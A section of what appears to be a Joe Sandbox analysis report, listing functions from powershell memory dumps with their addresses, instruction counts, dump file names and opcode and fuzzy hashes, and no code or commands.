                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F2698 Relevance: 5.6, Strings: 1, Instructions: 4326COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: t(q
                                              • API String ID: 0-3080623236
                                              • Opcode ID: c84b76d58d1e70af574630794a05bcefe20800796ac2d022e8f1fd53f8604d02
                                              • Instruction ID: e6e0493be4ceb1b3929c89ca63ce11c81df7ecbb7194ffa9143231ccc2999036
                                              • Opcode Fuzzy Hash: c84b76d58d1e70af574630794a05bcefe20800796ac2d022e8f1fd53f8604d02
                                              • Instruction Fuzzy Hash: 60A3E974E012599FEB54DF64CC54BDEB7B2EB89300F0045E9910DAB294DB39AE82DF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089B07C8 Relevance: 2.4, Strings: 1, Instructions: 1164COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H(q
                                              • API String ID: 0-797520398
                                              • Opcode ID: 3441ad7c43c32d1f9bc030a9d1b04a089805853cb33939f4e06d618bb1d2bb23
                                              • Instruction ID: 5ce39a86078b0b0f2cca32fd106a463cc60d2d608097664a750a93fc566a0621
                                              • Opcode Fuzzy Hash: 3441ad7c43c32d1f9bc030a9d1b04a089805853cb33939f4e06d618bb1d2bb23
                                              • Instruction Fuzzy Hash: 06B23C34A012189FEB55EF64CC51BDEBBB2EF89301F1085E9D509AB250DB359E82DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083AE390 Relevance: 1.8, Strings: 1, Instructions: 525COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 6360cb9ba73d468b812ff0cb4f49e4a98f62a48aba0c146799fef881f4fa9068
                                              • Instruction ID: a7d13428441a65bf1906a2f43c3e2ecbf3808aa0d5e2ee9d153642800e079a77
                                              • Opcode Fuzzy Hash: 6360cb9ba73d468b812ff0cb4f49e4a98f62a48aba0c146799fef881f4fa9068
                                              • Instruction Fuzzy Hash: D812F634A00218DFEB24DBB5D854A6E7BBAEBC8602F15846DD506EB395DA34EC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089BB540 Relevance: 1.1, Instructions: 1111COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04deb715e63c92ea047c7bb0d530e38614ed0d758be490d2c23e57fb5c58f04d
                                              • Instruction ID: 4b3e0d55323c59f1155c251e36970c84c0b7710cccfea1000c8adc8e92425c35
                                              • Opcode Fuzzy Hash: 04deb715e63c92ea047c7bb0d530e38614ed0d758be490d2c23e57fb5c58f04d
                                              • Instruction Fuzzy Hash: FA92EC35B01314DFDB69AB34C811BAD77A3AF86305F6088BDD209AF391DE769981DB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A8D28 Relevance: 1.0, Instructions: 1039COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84ff7daa87307fd143dba0190b9533644ae5d97375ea5bf213d89ee6ce1776bb
                                              • Instruction ID: 0252c55a2c41505261eb788ef77ed4a8a2b499b2f9bbd27d202c9fc040c88aa2
                                              • Opcode Fuzzy Hash: 84ff7daa87307fd143dba0190b9533644ae5d97375ea5bf213d89ee6ce1776bb
                                              • Instruction Fuzzy Hash: E1920974B002158FDB54DF68D894BAEB7F6EF88211F1085A9D90AEB365DA30ED42CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A5A80 Relevance: 1.0, Instructions: 987COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e92a58f14a3bfb6fc574b8bb6d1716c93a470047b21c6a60401a1375031638b
                                              • Instruction ID: aeb2dfc7d563e5c32db94b95a519d99941ebb6ea37ba65955fb41cbc891c563e
                                              • Opcode Fuzzy Hash: 0e92a58f14a3bfb6fc574b8bb6d1716c93a470047b21c6a60401a1375031638b
                                              • Instruction Fuzzy Hash: DA824C34B002158FDB44DF68C894A6EBBB2FFC8715B1585A9D506DB3A5DB34EC42CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089BCDE0 Relevance: 1.0, Instructions: 987COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 328faf2ee02320d4c06157f9507e15721a6b97e02e99569414d949385e93250f
                                              • Instruction ID: fa77c5ee56f2cefd7ea137759009074aeeae0e97b99d5e95a442f256c62f597b
                                              • Opcode Fuzzy Hash: 328faf2ee02320d4c06157f9507e15721a6b97e02e99569414d949385e93250f
                                              • Instruction Fuzzy Hash: E9627E357413049FEB25BB74C851BAE77A3ABC6302F644879E6019F3D2DE76D8429B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089BE108 Relevance: .7, Instructions: 735COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac022d0eeee084f689d3c675372e803b2a7429bd5a9229c6c2e6e884c32196b1
                                              • Instruction ID: cdbaadf112b0b4fa6d42f90e3c08368e4d7e3c1db28ec427228ea63ef9f1f60f
                                              • Opcode Fuzzy Hash: ac022d0eeee084f689d3c675372e803b2a7429bd5a9229c6c2e6e884c32196b1
                                              • Instruction Fuzzy Hash: 78424E357413049FEB25BB74C851BAE77A3AFC6302F604479E605AF3D1DE7698829B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089B8380 Relevance: .7, Instructions: 721COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ca681714d3d49a5bfeb7a1a9f6d3ba29afb1de83a535f7f75643a88da08e386
                                              • Instruction ID: 0fa1776a994c74af9adbd7c75a988c213c27e0fe2fa0a8944a06e41f6928c481
                                              • Opcode Fuzzy Hash: 9ca681714d3d49a5bfeb7a1a9f6d3ba29afb1de83a535f7f75643a88da08e386
                                              • Instruction Fuzzy Hash: F8422F357413049FEB29BB70D811BAE76A3AFC5705F20847DD602AF3D5DE7698829B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089BA3A8 Relevance: .7, Instructions: 656COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83e4f0b50cac7b85682e8665ed7ce855d29a7c0447c6b843b3f432ad2115de64
                                              • Instruction ID: b00ff21efd711d1f07618052c5004ad03a842c902baae84fcf6949b2de423689
                                              • Opcode Fuzzy Hash: 83e4f0b50cac7b85682e8665ed7ce855d29a7c0447c6b843b3f432ad2115de64
                                              • Instruction Fuzzy Hash: 4C32FA357013049FDB29BB74C851BAE77A3AFC6306F60487DD6069F391DE7698829B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089B9BA8 Relevance: .6, Instructions: 626COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: da181bbc8160e5a121c2756d41a594a3bbe56c9aad691797e2c000d27e6fa64f
                                              • Instruction ID: 7d17f0c727987bfef3022aea520f87d666d4b1a0d1029cf4fc63eea49e9c7712
                                              • Opcode Fuzzy Hash: da181bbc8160e5a121c2756d41a594a3bbe56c9aad691797e2c000d27e6fa64f
                                              • Instruction Fuzzy Hash: B6224C357413059FEB25BB74C851BAE77A3AFC6302F608879E2059F3D1DE7698429B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089BAD40 Relevance: .6, Instructions: 622COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f799402eee73d54e834c35deafaa3421a2d271230fa65aa3eabd49dbdcdf49d4
                                              • Instruction ID: b942fb035ac1b420e759e35067e47377c2afdda9a35627574913e640e5becdae
                                              • Opcode Fuzzy Hash: f799402eee73d54e834c35deafaa3421a2d271230fa65aa3eabd49dbdcdf49d4
                                              • Instruction Fuzzy Hash: 93223C357403049FEB29BB74C851BAE77A3ABC6702F60487DE6059F3D1DE7698429B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A8330 Relevance: .6, Instructions: 588COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db5a227a47717d6808c51985dc9ead1ab98e35af15112de00dea7f175476482a
                                              • Instruction ID: 976a310c774ca39fd72fc6846434d4a964f3936fe7f65bf2ef08dcc4fe0aa754
                                              • Opcode Fuzzy Hash: db5a227a47717d6808c51985dc9ead1ab98e35af15112de00dea7f175476482a
                                              • Instruction Fuzzy Hash: F9421734A00205DFDB14DF68D584A9EBBF2FF88311F158569E816AB361DB31EC82CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A7C50 Relevance: .6, Instructions: 575COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 570cab6a03933c680aac47530652829e1e3dd32227001271b04ff6f8d43b2e5b
                                              • Instruction ID: 16e4c3c73275786cabf48caf32c66c3dbfd419e9822cfff350f1b795a3c13226
                                              • Opcode Fuzzy Hash: 570cab6a03933c680aac47530652829e1e3dd32227001271b04ff6f8d43b2e5b
                                              • Instruction Fuzzy Hash: 9F226075B002058FDB04DF79D854AAEB7E6EFC8211F158069E946DB3A1DE35EC02CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089B3EB0 Relevance: .6, Instructions: 563COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f669266e56c13bdc9f2e0371f3fabddec309ce5985b236428acb7edc39317512
                                              • Instruction ID: 59e4acb39a39b32ef0be68cba67833dff06c69e1570cba6fa3a7694ef18d38ab
                                              • Opcode Fuzzy Hash: f669266e56c13bdc9f2e0371f3fabddec309ce5985b236428acb7edc39317512
                                              • Instruction Fuzzy Hash: 2C129F357403049FEB25BB34C851BAE77A3ABC6702F648479E605AF3D2CE76D8429B44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F7BE2 Relevance: .5, Instructions: 497COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ac36859f5c4b70ae53b79c37848b4a1780e03b0f7684135ab0d9d14201a03d7
                                              • Instruction ID: cbaeeac0965d5c87683bc22420603f3d2226e019d9fe900bff9ad6af7f6f124d
                                              • Opcode Fuzzy Hash: 6ac36859f5c4b70ae53b79c37848b4a1780e03b0f7684135ab0d9d14201a03d7
                                              • Instruction Fuzzy Hash: EE22F930A003499FEB54EFB4D8547EEB7B2FF88304F1145A8D109AB694DB35AE428F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F7BF0 Relevance: .5, Instructions: 491COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e38d32f9410e67e709d18d0da9a4dc3bdbaa79579c12925c0acae6d272cdd8d
                                              • Instruction ID: a4bd33f747346f83f1f33ca84a971a4ffc7a3a2df9ee0eb45bf33276e1116cb0
                                              • Opcode Fuzzy Hash: 0e38d32f9410e67e709d18d0da9a4dc3bdbaa79579c12925c0acae6d272cdd8d
                                              • Instruction Fuzzy Hash: 7D22E870A003499FEB54EFB4D8547EEB7B2FF88304F1145A8D109AB694DB35AE428F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083AD528 Relevance: .4, Instructions: 392COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e3060464003290f0f70cf446c5bacac2145c297981c6a5f69a9680fc231394f
                                              • Instruction ID: a065cc43ac3571fc67180c4024390601913310ba80db1549cb9edd52ea9059e1
                                              • Opcode Fuzzy Hash: 3e3060464003290f0f70cf446c5bacac2145c297981c6a5f69a9680fc231394f
                                              • Instruction Fuzzy Hash: 67D18135B002149FDB18EB74D854A6E77F6EFC8611B14852DE806AB794DF35ED02CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089B9640 Relevance: .4, Instructions: 372COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1dd284cd6a55dd97e4d4c1dcbb7b9c05065d05bb43e1f5183d480bfa270cb195
                                              • Instruction ID: ed8f58ac4cdfeeabbc9562564aade27fb6864b253cb2529b7de8ee95998a8ac8
                                              • Opcode Fuzzy Hash: 1dd284cd6a55dd97e4d4c1dcbb7b9c05065d05bb43e1f5183d480bfa270cb195
                                              • Instruction Fuzzy Hash: 2BC15D353413049FEB29B734D851BAE37A3ABCA306F644879D6069F3D2DE76D8429780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083AE380 Relevance: .2, Instructions: 250COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 672ef705631bfb5a2931ec1a21fe0cf2d27eb1b6488ab798aba55325d5e0ba2b
                                              • Instruction ID: ebdf0e5443e8bbdcc0854ad9e08959e57cd2b8faaaddf478b08fdc081e1c163a
                                              • Opcode Fuzzy Hash: 672ef705631bfb5a2931ec1a21fe0cf2d27eb1b6488ab798aba55325d5e0ba2b
                                              • Instruction Fuzzy Hash: DAA12A74A002189FEB14DBB9D854AAEBBF6FF88701F15856DD406EB361DA34AC41CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%